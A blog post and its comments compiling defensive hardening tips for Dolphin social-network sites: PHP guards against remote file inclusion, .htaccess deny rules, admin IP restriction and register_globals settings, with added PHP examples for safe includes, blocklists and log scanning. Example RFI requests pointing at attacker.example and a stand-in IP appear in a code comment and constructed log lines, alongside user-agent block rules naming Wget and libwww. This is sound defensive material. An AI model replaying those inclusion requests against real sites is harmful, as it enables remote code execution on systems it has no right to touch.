At some point in your site's existence, there will be attempts to hack it. I know several months ago there was a rash of Dolphin sites being compromised, as hackers had intensely targeted the app.
Hackers have compromised sites like Facebook, MySpace and Twitter, and I am sure many others that have been reported or have yet to be. While you can't stop a hacker from trying to get into your site, you can definitely make it more work by applying some of the techniques listed below. I've rounded up the first batch in this blog. This is a compilation of the ones I've found very helpful. There are others, I am sure, and if you have a link, please send it to me for inclusion.
SOURCE: sammie - http://www.boonex.com/unity/blog/entry/Fix_for_dolphin_exploit
1. Add the following to your ray/modules/global/inc/content.inc.php:
if (isset($_REQUEST['sIncPath']))
die ('Hacking attempt');
So that, when you're done it looks like this:
if (isset($_REQUEST['sIncPath']))
die ('Hacking attempt');
require_once($sIncPath . "xml.inc.php");
require_once($sIncPath . "constants.inc.php");
require_once($sIncPath . "apiFunctions.inc.php");
This stops a request-supplied sIncPath from pulling a remote file into those require_once calls (a remote file inclusion) and using it against your site.
2. Add the following to your /plugins/safehtml/HTMLSax3.php (this file builds its include path from $dir, so that is the variable to guard here):
if (isset($_REQUEST['dir']))
die ('Hacking attempt');
So when you're done, it looks like this:
if (isset($_REQUEST['dir']))
die ('Hacking attempt');
require_once( "{$dir['plugins']}safehtml/HTMLSax3/States.php" );
require_once( "{$dir['plugins']}safehtml/HTMLSax3/Decorators.php" );
This prevents remote access to your directories: a request can no longer supply the $dir value those includes are built from.
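As an added example (not Dolphin's own code), here is the include pattern fixes 1 and 2 guard against, with the page's guard for both variables and an extra check that the include directory is local and inside the installation. register_globals, which gameutopia explains how to turn off further down, is what lets a query parameter become $sIncPath in the first place. The helper name safe_include_dir and the choice of this file's own directory as the allowed base are assumptions for the example.

```php
<?php
// Added example (not Dolphin's code). Shows why fixes 1 and 2 matter and
// how to stop depending on a variable that could have come from a request.
//
// Vulnerable pattern, as it appears in content.inc.php / HTMLSax3.php:
//
//     require_once($sIncPath . "xml.inc.php");
//
// With register_globals=On, a request such as ?sIncPath=http://attacker.example/
// creates $sIncPath before that line runs, and require_once then fetches and
// executes remote code (remote file inclusion).

// Fix 1 and fix 2 combined: refuse any request that tries to supply the
// variables the includes rely on. Works whether or not register_globals is on.
foreach (array('sIncPath', 'dir') as $name) {
    if (isset($_REQUEST[$name])) {
        header('HTTP/1.1 400 Bad Request');
        die('Hacking attempt');
    }
}

// register_globals is the root cause; log loudly if it is still on.
if (ini_get('register_globals')) {
    error_log('register_globals is On; turn it off in .htaccess or php.ini');
}

// Hypothetical helper: returns a normalised include directory, or false if
// $candidate is a URL, a stream wrapper, or anything outside $base.
function safe_include_dir($candidate, $base)
{
    // A scheme prefix (http://, ftp://, php://, data://, ...) means remote
    // or wrapper access, never a local directory.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $candidate)) {
        return false;
    }
    $real     = realpath($candidate);
    $baseReal = realpath($base);
    if ($real === false || $baseReal === false || !is_dir($real)) {
        return false;
    }
    // Must be $base itself or a directory beneath it; this also defeats
    // ../ traversal because realpath has already resolved it.
    if ($real !== $baseReal
        && strpos($real, $baseReal . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $real . DIRECTORY_SEPARATOR;
}

// Normally $sIncPath was set by a config file included before this point;
// fall back to this file's own directory if it is missing. Assumed base:
// includes must live in or under this file's directory.
$candidate = isset($sIncPath) ? $sIncPath : dirname(__FILE__);
$sIncPath  = safe_include_dir($candidate, dirname(__FILE__));
if ($sIncPath === false) {
    die('Invalid include path');
}

require_once($sIncPath . 'xml.inc.php');
require_once($sIncPath . 'constants.inc.php');
require_once($sIncPath . 'apiFunctions.inc.php');
```

The guard at the top is the page's fix and is enough on its own; the helper is for installations where the include path comes from a config file, so that a bad value there fails closed instead of being passed straight to require_once.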
The first set of rules below blocks any request whose query string starts with or contains a URL, which is how remote include attempts arrive; the second set refuses requests from the libwww and Wget scripted user agents. Both go inside the mod_rewrite block of your .htaccess (see the full placement example later in this post):
RewriteCond %{QUERY_STRING} ^http [OR]
RewriteCond %{QUERY_STRING} ^.+www\. [OR]
RewriteCond %{QUERY_STRING} ^.+https [OR]
RewriteCond %{QUERY_STRING} ^.+ftp
RewriteRule .* - [L,F]
RewriteCond %{HTTP_USER_AGENT} ^libwww [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget
RewriteRule .* - [F]
Block others from viewing your .htaccess files in a web browser:
yoursite.com/.htaccess (near the bottom add)
<Files .htaccess>
deny from all
</Files>
You can also deny single IP addresses or ranges:
<Files *>
order deny,allow
deny from 191.0.0.0
deny from 195.0.0.0
</Files>
<Files *>
deny from 124.187.
deny from 58.0.0.0/8
allow from 58.121.39.45
</Files>
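As an added example (not from any of the sources quoted in this post), the script below turns a plain-text IP blocklist, such as the wizcrafts.net lists linked further down or the list of attacking IPs mentioned in the comments, into the <Files *> deny block shown above. It validates each entry so one malformed line cannot break the whole .htaccess. The sample list is constructed; the function names are my own.

```php
<?php
// Added example, not the page's code. Converts a text blocklist into an
// Apache "deny from" block. Invalid lines are reported rather than written.

// Constructed sample blocklist: one entry per line, '#' starts a comment.
$blocklist = "
# ranges and single hosts
191.0.0.0
195.0.0.0
124.187.            # partial prefix: Apache matches 124.187.*.*
58.0.0.0/8          # CIDR block
58.0.0.0/8          # duplicate, dropped
999.1.2.3           # invalid octet, reported and dropped
evil.example.com    # host names force a reverse lookup per request; dropped
";

// Matches one IPv4 octet, 0-255 with no leading zeros.
define('OCTET', '(?:25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])');

// True if $entry is something Apache's "deny from" accepts as an address:
// a full IPv4 address, an a.b.c.d/n CIDR block, or a partial prefix with a
// trailing dot such as "124.187.".
function is_deny_entry($entry)
{
    $o = OCTET;
    $full    = "/^$o(?:\\.$o){3}(?:\\/(?:3[0-2]|[12]?[0-9]))?$/";
    $partial = "/^$o(?:\\.$o){0,2}\\.$/";
    return preg_match($full, $entry) === 1 || preg_match($partial, $entry) === 1;
}

// Parses the list text; returns array('deny' => [...], 'rejected' => [...]).
function parse_blocklist($text)
{
    $deny = array();
    $rejected = array();
    foreach (preg_split('/\r?\n/', $text) as $line) {
        $line = trim(preg_replace('/#.*$/', '', $line));   // strip comments
        if ($line === '') {
            continue;
        }
        if (is_deny_entry($line)) {
            $deny[$line] = true;                            // keys dedupe
        } else {
            $rejected[] = $line;
        }
    }
    return array('deny' => array_keys($deny), 'rejected' => $rejected);
}

// Renders the .htaccess fragment in the same form the post uses.
function build_deny_block(array $entries)
{
    $out = "<Files *>\norder deny,allow\n";
    foreach ($entries as $e) {
        $out .= "deny from $e\n";
    }
    return $out . "</Files>\n";
}

$parsed = parse_blocklist($blocklist);
echo build_deny_block($parsed['deny']);
foreach ($parsed['rejected'] as $bad) {
    fwrite(STDERR, "skipped invalid entry: $bad\n");
}
```

Run it from the command line, review the generated block, and paste it into the .htaccess in your Dolphin root; rejected entries go to stderr so they are not mixed into the output you paste.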
SOURCE: Dialme.com
.htaccess files are recursive, meaning that if you put one in a directory all the subdirectories are affected. So in my media directory I block ALL scripts like this:
That "LimitExcept" blocks all "PUT" and "POST" requests too. You CAN'T use this in a directory that has .php files inside it, or in any of its sub-dirs. But it SHOULD be inside ALL the /files directories for each ray widget, and the /media directory.
Sample locations:
yoursite.com/media/.htaccess
yoursite.com/ray/modules/movie/files/.htaccess
yoursite.com/ray/modules/mp3/files/.htaccess
yoursite.com/ray/modules/music/files/.htaccess
Code:
<LimitExcept GET>
Order deny,allow
deny from all
</LimitExcept>
<FilesMatch "\.(cgi|pl|py|bak|txt|htaccess|htpasswd|log|zip|asp|sh|shtml|js.*|gz|tgz|tar|php.*|htm.*)$">
Deny from all
</FilesMatch>
SOURCE: Dialme.com
Let's make it so that even if a hacker gets the credentials out of your database he STILL can't get into the admin. Put this inside the .htaccess that is in your /admin directory:
For example:
<Files *>
order deny,allow
deny from all
allow from 192.168.0.1
</Files>
The IP addresses listed will be allowed to access the admin.
This way even if someone gets YOUR password and login they STILL can't get inside the admin area.
*If your IP changes then this probably isn't the best solution. You will still be able to access FTP regardless of your IP address. This just blocks web access to your admin folder other than from the 2 IPs specified. So even if your IP did change you can just FTP into your admin directory and update the IPs with your new IP addresses to allow.
Source: MakeASocialNetwork.com
Several of the hacking groups only do one thing when they DO get in: they change your homepage to their logo (defacement). Just like #1 this is automated; they overwrite index.php or add one. Well, what if your homepage isn't index.php? Even if their bot gets one in, none of your visitors will ever know :-) How? Simple: rename your index.php (in this example myindex.php) and then put this in your .htaccess:
DirectoryIndex myindex.php
and inside the mod_rewrite block:
RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /index\.php\ HTTP/
RewriteRule ^index\.php$ http://www.yoursite.com/ [R=301,L]
So any request for http://www.yoursite.com/index.php will be directed
to http://www.yoursite.com/ and the new homepage is really myindex.php
If you do this then you need to put a line setting it back to index.php inside all the other directories (like admin and ray), OR change it in them too.
Let them wrap their minds around why they got their bogus file in but it isn't showing :-)
Source: BoonexNerd.net
Add an index.php file in the root of a directory that you want to be reachable only if the person knows the exact URL. You can add the following to the index.php file:
<?php
header( "HTTP/1.1 301 Moved Permanently" );
header( "Status: 301 Moved Permanently" );
header( "Location: http://www.boonexnerd.net" );
//exit(0); //jt note - in some cases you may need to uncomment this out.
//To uncomment, delete the two forward slashes in front of exit(0)
?>
Source: BoonexNerd.net
Another way to redirect a curious user is by adding the following to your .htaccess file. The example below redirects traffic from my Boonexnerd.com site over to my Boonexnerd.net site:
#-------------------------Redirect START --------------------------------------
#Apache mod_rewrite module must be enabled in order for this redirect to work
RewriteCond %{HTTP_HOST} ^www\.boonexnerd\.com [NC]
RewriteRule ^(.*)$ http://www.boonexnerd.net/dolphin/$1 [L,R=301]
#HTTP_HOST holds only the host name, never a path, so the /testredirect/ part
#has to go in the RewriteRule pattern rather than in the RewriteCond
RewriteCond %{HTTP_HOST} ^boonexnerd\.com [NC]
RewriteRule ^testredirect/(.*)$ http://www.boonexnerd.net/dolphin/$1 [L,R=301]
#-------------------------Redirect END --------------------------------------
Just replace my domain with yours. One question you may ask is, "Where do I put this thing?". Here's an example of placement:
Open your .htaccess file and add this to the file:
<IfModule mod_rewrite.c>
RewriteEngine on
#-------------------------Redirect START --------------------------------------
#Apache mod_rewrite module must be enabled in order for this redirect to work
RewriteCond %{HTTP_HOST} ^www\.boonexnerd\.com [NC]
RewriteRule ^(.*)$ http://www.boonexnerd.net/dolphin/$1 [L,R=301]
#HTTP_HOST holds only the host name, never a path, so the /testredirect/ part
#has to go in the RewriteRule pattern rather than in the RewriteCond
RewriteCond %{HTTP_HOST} ^boonexnerd\.com [NC]
RewriteRule ^testredirect/(.*)$ http://www.boonexnerd.net/dolphin/$1 [L,R=301]
#-------------------------Redirect END --------------------------------------
RewriteCond %{QUERY_STRING} ^http [OR]
RewriteCond %{QUERY_STRING} ^.+www\. [OR]
RewriteCond %{QUERY_STRING} ^.+https [OR]
RewriteCond %{QUERY_STRING} ^.+ftp
RewriteRule .* - [L,F]
RewriteCond %{HTTP_USER_AGENT} ^libwww [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget
RewriteRule .* - [F]
</IfModule>
SOURCE: http://www.boonex.com/unity/forums/topic/Dolphin-not-secure-Hacked-.htm
gameutopia says:
First thing to do is to determine if register_globals is on or off. You can log in to your admin panel first, then visit:
yoursite.com/admin/phpinfo.php
Scroll down until you see register_globals
You should see two columns, local and master. Master is what your host has specified, and local would be your site/directory. You can override your host's master value by using .htaccess on PHP Apache servers or php.ini with CGI servers.
The code varies slightly.
For php apache servers add to your main .htaccess file yoursite.com/.htaccess:
php_flag register_globals off
For cgi servers add to or edit your current php.ini file in yoursite.com/php.ini:
register_globals = Off
If you don't have php.ini make one with the above line and call it php.ini (cgi-servers only)
Else ask your host for the certain and/or exact location to put php.ini.
Go back to yoursite.com/admin/phpinfo.php and refresh the page to verify the changes were successful, i.e. register_globals changed from on to off for certain in the local value, but if both local and master change that is OK too.
Keep your files healthy. Have a look at some of these FREE Antivirus Programs
http://www.avast.com/eng/download-avast-home.html
http://www.free-av.com/
http://www.wizcrafts.net/chinese-blocklist.html
This will list ip addresses for blocking.
http://www.wizcrafts.net/exploited-servers-blocklist.html
This will list exploited servers.
http://www.changedetection.com/
This will monitor your site
And these are not necessarily a direct defense against hackers, but services that will alert you if something has gone wrong with your site. They will keep an eye on your site, ping it at set intervals, and report any weirdness that may have occurred.
http://www.montastic.com/
http://mon.itor.us/
http://site24x7.com/
The last one on the list I've used and will also monitor if the content on your site has changed. For example, if the front page got defaced.
So there you have it, some of the fixes and updates that you may want to add to your own files in order to harden your site just a bit.
And finally, I have a daily list of ip addresses that have attempted to compromise my nerd site. If you are interested in getting the list please let me know. I will send you a daily/weekly report of suspected hackers based on my own server being attacked.
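As an added example (not the post's own tooling), the script below scans Apache combined-format access log lines for the same things the .htaccess rules above reject (a URL in the query string, the sIncPath and dir parameters from fixes 1 and 2, and the libwww and Wget user agents) and tallies the source IPs. That is the kind of "attempted compromise" list the post offers to share, and each IP it prints can go straight into a deny from line. The log lines are constructed and the function names are my own.

```php
<?php
// Added example, not the page's code. Finds hostile requests in Apache
// combined-format log lines and tallies them per source IP.

// Constructed sample log lines (documentation-range IPs).
$sampleLog = array(
    '203.0.113.7 - - [10/Oct/2008:13:55:36 -0700] "GET /ray/modules/global/inc/content.inc.php?sIncPath=http://198.51.100.9/x.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '198.51.100.23 - - [10/Oct/2008:13:56:01 -0700] "GET /plugins/safehtml/HTMLSax3.php?dir%5Bplugins%5D=ftp://198.51.100.9/ HTTP/1.1" 200 512 "-" "Wget/1.10.2"',
    '192.0.2.44 - - [10/Oct/2008:13:57:12 -0700] "GET /index.php?page=profile&id=42 HTTP/1.1" 200 8192 "http://www.example.com/" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2008:13:58:40 -0700] "POST /admin/index.php HTTP/1.1" 403 221 "-" "libwww-perl/5.805"',
);

// Splits one combined-log line into its parts; returns null if it does not
// parse, so truncated or odd lines are skipped rather than guessed at.
function parse_log_line($line)
{
    $re = '/^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+)[^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    $parts = explode('?', $m[3], 2);   // path and raw query string
    return array(
        'ip'     => $m[1],
        'method' => $m[2],
        'path'   => $parts[0],
        'query'  => isset($parts[1]) ? $parts[1] : '',
        'status' => (int) $m[4],
        'ua'     => $m[5],
    );
}

// Returns the list of reasons a request looks hostile; empty means benign.
function classify_request(array $req)
{
    $reasons = array();
    $q = urldecode($req['query']);   // brackets etc. arrive percent-encoded
    // Mirrors the QUERY_STRING RewriteConds: a URL at the start of, or
    // embedded as a parameter value in, the query string.
    if (preg_match('#(^|=)(https?|ftp)://#i', $q) || preg_match('/^http/i', $q)) {
        $reasons[] = 'url-in-query';
    }
    // The two variables fixes 1 and 2 refuse to take from the request.
    if (preg_match('/(^|&)(sIncPath|dir)(\[[^\]]*\])?=/', $q)) {
        $reasons[] = 'rfi-param';
    }
    // Mirrors the HTTP_USER_AGENT RewriteConds.
    if (preg_match('/^(libwww|Wget)/', $req['ua'])) {
        $reasons[] = 'scanner-ua';
    }
    return $reasons;
}

// Tallies hostile requests per source IP: ip => array(reason => count).
function suspicious_ips(array $lines)
{
    $hits = array();
    foreach ($lines as $line) {
        $req = parse_log_line($line);
        if ($req === null) {
            continue;
        }
        foreach (classify_request($req) as $why) {
            if (!isset($hits[$req['ip']][$why])) {
                $hits[$req['ip']][$why] = 0;
            }
            $hits[$req['ip']][$why]++;
        }
    }
    return $hits;
}

// Emit one "deny from" line per hostile IP, annotated with why it was flagged.
foreach (suspicious_ips($sampleLog) as $ip => $reasons) {
    $detail = array();
    foreach ($reasons as $why => $n) {
        $detail[] = "$why x$n";
    }
    echo "deny from $ip    # " . implode(', ', $detail) . "\n";
}
```

Feed it your real access log with file() instead of the constructed array, and treat the "scanner-ua" reason on its own as weaker evidence than "url-in-query" or "rfi-param", since a legitimate script can identify itself as Wget.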
...sip...
Truly valuable and beneficial post. Thank you.
I am very interested in receiving the list of suspected hackers. How do I block the hackers once I have the list? Do I plug them into the Dolphin Root .htaccess mentioned above and are there other places to possibly block them?
Duh?
Juker
Thanks to you and everyone who chimed in. Here's a sample .htaccess file that shows placement of the deny ip addresses:
http://www.boonexnerd.net/dolphin/htaccessSample.txt
In terms of the list, I've used the list from http://www.wizcrafts.net/. I am also making my own list to share with those who want it. It will be a page where you can download the ip addresses who have attempted to hack my site.
...sip...
When I find useful information I will bookmark it and then take note of the parts that were important.
The reality is I just put it together...he he hee... Much of the credit really goes to the ones who actually wrote the info.
...sip...
The best way to stop all (or almost all) unwanted spam and similar bots is (if you host on your own server) to use iptables (Linux iptables = firewall) and a script for auto updating the blacklist.
If someone is interested I can help....